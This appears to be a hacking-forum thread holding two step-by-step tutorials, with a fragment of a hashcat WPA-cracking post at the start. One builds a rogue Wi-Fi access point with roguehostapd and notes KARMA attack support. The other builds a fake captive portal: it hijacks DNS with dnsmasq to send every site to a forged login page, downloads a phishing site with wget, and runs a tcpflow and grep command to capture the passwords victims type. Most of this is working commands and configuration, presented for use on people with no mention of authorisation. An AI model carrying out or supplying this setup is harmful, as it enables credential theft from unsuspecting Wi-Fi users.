    The conclusion that can be drawn from all of the above is that hashcat is not limited to a handful of hashes; in fact it is applicable to a wide range of hashes and other possibilities, including mixed and concatenated strings. We learned to crack WPA/WPA2 using hashcat.

    Besides, hashcat is known for its power, stability and speed when operating on a GPU. It also gives us the possibility of mask attacks, which let us test thousands upon thousands of candidate strings against the hash.

  9. Sun Feb 9 21:15:39 2020

    [attachment:5e4012e1d13a5]

    Hosting a wireless access point is rather easy on Windows and Android compared to Debian and other Linux distros. On Linux you have to provide every single detail yourself by configuring packages and writing configuration files. In Windows there are just a couple of commands to accomplish the task, and on Android it's the hotspot feature. Approaching this on Linux is a bit tricky and, for newcomers, perplexing.

    The widely accepted tool for the purpose is hostapd, which we have also used in some of the earlier tutorials. Lately, the developers of wifiphisher wrote a small tool that tackles the problem of handling the hostapd configuration in a more robust way. It was integrated into wifiphisher and named roguehostapd (a modified version of hostapd). The developers note that some previously known errors were removed in the newer version and that it also supports some other wireless attacks.

    Roguehostapd provides a simple CLI interface with argument options to deal with user requirements, just like a normal command-line tool. It also supports the KARMA attack, where the attacker provides clients with internet connectivity while still controlling the traffic. However, note that we will still have to configure a DHCP server, for which we will use dnsmasq.

    STEP 1

    Installation

    Dnsmasq can easily be installed with apt; however, that's not the case with roguehostapd. Update your system and install the prerequisites.

    $ apt update
    $ apt install libnl-3-dev libnl-genl-3-dev libssl-dev dnsmasq

    To make roguehostapd behave like a normal command-line tool, we will manually place it under a directory and create a link in a directory on the PATH. Move to the /opt directory and clone the tool from GitHub:

    $ cd /opt/
    $ git clone https://github.com/wifiphisher/roguehostapd.git
    $ cd roguehostapd/roguehostapd/
    $ ls -l

    And finally create the soft link to command execution directory:

    $ ln -s /opt/roguehostapd/roguehostapd/run.py /usr/bin/rghostapd

    We've followed this way of installation to use it as a normal command utility. To integrate it with wifiphisher instead, a single command is enough:

    $ pip install roguehostapd

    STEP 2

    Monitor Mode

    Put your wireless card in monitor mode:

    $ airmon-ng start wlan1

    STEP 3

    Wireless Access Point

    The manual for roguehostapd can now be printed from the CLI:

    $ rghostapd --help

    [attachment:5e4013645d4e4]

    To launch a wireless access point with rghostapd, execute the following command:

    $ rghostapd -i "wlan1mon" --ssid "WiFi Name" -c 6 -pK "password"

    • -i, --interface: Monitor Mode interface to host the AP on.
    • -c, --channel: Access Point Channel.
    • --ssid: Wireless Access Point ESSID or Name.
    • -pK, --wpa2password: Access Point WPA2 password.

    [attachment:5e401401f0a10]

    STEP 4

    DHCP server

    Since we have our Access Point, all we need is a DHCP server to let the actual traffic flow through our network. We have dnsmasq for this part. Create a temporary configuration file for dnsmasq with nano:

    $ nano /tmp/dnsmasq.conf

    And write the following configuration into the file, with the wireless interface replaced by your own interface:

    interface=wlan1mon
    dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
    dhcp-option=3,192.168.1.1
    dhcp-option=6,192.168.1.1
    server=8.8.8.8
    log-queries
    log-dhcp
    listen-address=127.0.0.1

    Press CTRL+X and then ENTER to save the file. Then execute the following two commands to assign the required IP and netmask to your interface:

    $ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
    $ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

    Then kill any dnsmasq process already running on your system:

    $ killall dnsmasq

    And finally, start dnsmasq:

    $ dnsmasq -C /tmp/dnsmasq.conf -d

    [attachment:5e4013f3ea6e2]

    STEP 5

    IP Forwarding

    The last thing is providing the Access Point users with internet access. For this we need another wired or wireless interface from which traffic will be forwarded to our Access Point interface. I've got two wireless adapters: one is connected to the internet (wlan0), and the other currently hosts the access point (wlan1mon).

    Just execute the following commands with the interface names replaced by your respective interfaces:

    $ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

    And at last, enable traffic forwarding in the kernel:

    $ echo 1 > /proc/sys/net/ipv4/ip_forward
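
    Note that this setting does not survive a reboot. If you want forwarding to be persistent (optional), the standard sysctl way is:

    $ echo 'net.ipv4.ip_forward=1' >> /etc/sysctl.conf
    $ sysctl -p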

    After this, your access point will be on duty to serve its users.

    Conclusion

    Setting up a wireless access point on Linux is trickier than on Windows or Android because we have to configure traffic forwarding and set up the network ourselves. Roguehostapd, the newer, updated take on hostapd, is not an official release but was developed by the wifiphisher developers to be integrated into their project. It also provides users with support for the wifi KARMA attack.

  10. Sun Feb 9 21:09:03 2020
    Men in Black started the conversation Hack Wifi: Setup Your Fake Access Point.

    [attachment:5e4010cac002e]

    It often happens that when you connect to a WiFi network, you get a notification or a splash screen that tells you to do something in order to use the WiFi. Usually, you will see a login screen. That screen is called Captive Portal.

    So, what is it? A Captive Portal is a small functional web page, usually triggered through DNS spoofing & server redirection rules that trick the OS. If successful, the OS will show the Captive Portal Login Page.

    Let's see how we can setup a Captive Portal Login Page.

    So, how does a captive portal work? It works through DNS hijacking or server redirection rules. Every OS has its own way of detecting a captive portal. Mostly, operating systems look for 302 redirection responses. Let's study each of their checks.

    Windows:

    Windows has its own way of detecting a captive portal. Usually it probes one of two sites:

    www.msftconnecttest.com
    www.msftncsi.com

    Android:

    Android checks the returned response code. For example, if the response is a 302, the OS will assume there is a captive portal and trigger it. Usually it probes one of the following:

    clients3.google.com
    connectivitycheck.gstatic.com
    connectivitycheck.android.com

    Apple:

    Unlike Android & Windows, when an Apple device sends a request, the site checks for a specific header that identifies the nature of the requesting device. Apple devices usually request the following URLs:

    www.appleiphonecell.com
    captive.apple.com
    www.apple.com
    .apple.com.edgekey.net

    From iOS 7 onward, Apple uses a specific User-Agent for Captive Portal requests, CaptiveNetworkSupport, which can be used to identify Apple devices.
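
    You can observe this probing behaviour yourself from a normally connected machine. For example (a quick sketch using Android's check URL; the server answers with an empty 204 when real connectivity exists, and anything else makes the OS suspect a captive portal):

    $ curl -sI http://connectivitycheck.gstatic.com/generate_204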

    Let's see how to setup the Captive Portal. We will be using hostapd for access point configuration, dnsmasq for DHCP server and nginx as our hosting web server and redirection rules.

    STEP 1

    Installation

    To achieve our objective, we will install everything we need up front. Update your repositories and install nginx and the other required tools:

    $ apt update
    $ apt install hostapd dnsmasq nginx

    Then put your wireless interface in monitor mode:

    $ airmon-ng start wlan1

    STEP 2

    Rogue Access Point

    We are about to use hostapd to host our Access Point, but this time with a small amendment; see the earlier post on hosting an access point with roguehostapd, which makes the task easier by replacing the full configuration with a few arguments.

    Create and save the hostapd configuration for the Access Point:

    $ nano /tmp/hostapd.conf
    interface=wlan1mon
    driver=nl80211
    ssid=[Fake AP Name] 
    hw_mode=g
    channel=[Fake AP Channel]
    macaddr_acl=0
    ignore_broadcast_ssid=0

    Start hostapd service:

    $ hostapd /tmp/hostapd.conf

    [attachment:5e4011a901a8e]

    STEP 3

    DHCP Server

    Now, we need a DHCP server to set up a small network and provide the connecting users with IP addresses. We will use dnsmasq for the purpose. Create and save a new configuration file for dnsmasq:

    $ nano /tmp/dnsmasq.conf
    interface=wlan1mon
    address=/#/192.168.1.1
    dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
    dhcp-option=3,192.168.1.1
    dhcp-option=6,192.168.1.1
    server=8.8.8.8
    log-queries
    log-dhcp
    listen-address=127.0.0.1

    In the configuration above we used the address field. What it does is resolve every hostname and IP to the single address provided; in our case that is the gateway address where our forged website will reside:

    address=/#/192.168.1.1

    In case you want to redirect only a few sites, you have to define each site explicitly, one address=/site/ip line per site. This approach is used when you are willing to provide internet access to the users. For example:

    address=/facebook.com/192.168.1.1
    address=/google.com/192.168.1.1
    address=/youtube.com/192.168.1.1

    But we don't want that here, because we want to redirect as much as possible: we don't know which site a user is going to request, so why not redirect them all?

    Start dnsmasq service:

    $ dnsmasq -C /tmp/dnsmasq.conf -d

    [attachment:5e401195ea1a8]

    Finally, execute these two commands to assign gateway ip and netmask to your interface:

    $ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
    $ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

    STEP 4

    Captive Portal

    Here starts the actual work. Create a new directory to hold your website and move into it. I'll name it captive_portal.

    $ mkdir /var/www/captive_portal
    $ cd /var/www/captive_portal

    Now, download the Rogue AP website and extract the files under this directory:

    $ wget https://www.shellvoide.com/media/files/rogueap.zip
    $ unzip rogueap.zip -d ./

    Now you should have the files placed under your captive_portal directory. All we need now is to set up the nginx configuration for our captive portal project. First, remove the enabled sites from the nginx configuration directory:

    $ rm /etc/nginx/sites-enabled/*

    Now, create a new configuration file for your captive portal project and place the following directives and then save the file:

    $ nano /etc/nginx/sites-enabled/captive_portal
    server{
        listen 80;
        root /var/www/captive_portal;        
    
        location / {
            if (!-f $request_filename){
                return 302 $scheme://192.168.1.1/index.html;
            }
        }
    }

    What happens with this nginx configuration is that whenever the user requests a file which doesn't exist, the request is redirected to our fake page, i.e. 192.168.1.1, which is exactly what we are trying to accomplish. Note that this redirect of non-existent files is the most important part. The root directive specifies the directory where the website is placed. Finally, reload the nginx service:

    $ service nginx reload
    $ service nginx restart

    Check if nginx is correctly serving our fake page:

    $ service nginx status

    [attachment:5e4012138b679]
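
    As a further check (a quick sketch, assuming the configuration above is active), request a path that doesn't exist and confirm nginx answers with a 302 pointing at http://192.168.1.1/index.html:

    $ curl -sI http://192.168.1.1/this-page-does-not-exist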

    STEP 5

    Capture Password

    Since we have our serviceable access point along with a forged document, we need a way to capture the password credentials. Previously, we used a MySQL database to store the data; however, there's an even better approach. Let's sniff and capture what is POSTed on the network. Open a terminal and execute this command:

    $ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

    What happens here is that we capture the whole network traffic on every interface and pipe it to grep, which looks for specific lines. I've set this up to match what will be POSTed when a user enters a password and presses Enter on the Captive Portal Login page. The data will be printed on screen as soon as it is entered on the forged website:

    STEP 6

    Internet Forwarding (Optional)

    The last step is to provide our users with internet access. However, achieving it is a bit tricky. What we would need to do is change or remove the address field in the dnsmasq configuration, but if we do, the Captive Portal will no longer work. So, what to do?

    To overcome this complication, i.e. to provide internet access while the Captive Portal is still served, the address field has to be defined explicitly for a set of given sites. For example, to only redirect Android-based operating systems, the address field would be:

    address=/clients3.google.com/192.168.1.1

    The same can be applied to other websites as well. There are multiple sites which have to be redirected correctly for this to work. I don't know all of them, but some of the well-known and widely implemented ones can be configured:

    interface=wlan1mon
    dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
    dhcp-option=3,192.168.1.1
    dhcp-option=6,192.168.1.1
    server=8.8.8.8
    log-queries
    log-dhcp
    listen-address=127.0.0.1
    
    address=/clients3.google.com/192.168.1.1
    address=/gsp1.apple.com/192.168.1.1
    address=/.akamaitechnologies.com/192.168.1.1
    address=/www.appleiphonecell.com/192.168.1.1
    address=/www.airport.us/192.168.1.1
    address=/.apple.com.edgekey.net/192.168.1.1
    address=/.akamaiedge.net/192.168.1.1
    address=/captive.apple.com/192.168.1.1
    address=/ipv6.msftncsi.com/192.168.1.1
    address=/www.msftncsi.com/192.168.1.1

    Then restart dnsmasq with this configuration.

    Finally, we need another interface which has an internet connection; the traffic from this interface will be forwarded to the access point interface. In my case this interface is named wlan0, and I will forward its traffic to wlan1mon. Execute the following commands with your respective interfaces:

    $ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

    Now, just one step to go...

    $ echo 1 > /proc/sys/net/ipv4/ip_forward

    It's all set up. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter a password in the fields and press Enter, the captured data will be printed in the tcpflow terminal:

    [attachment:5e40127485d7c]

    Conclusion

    The conclusion that can be drawn from all of the above is that users can easily be tricked into performing unexpected actions when it comes to wifi. With a captive portal login page, the interactivity of the rogue Access Point increases and the attack gains a larger surface. Above all, the workings of a captive portal rest purely on the principle of redirection.
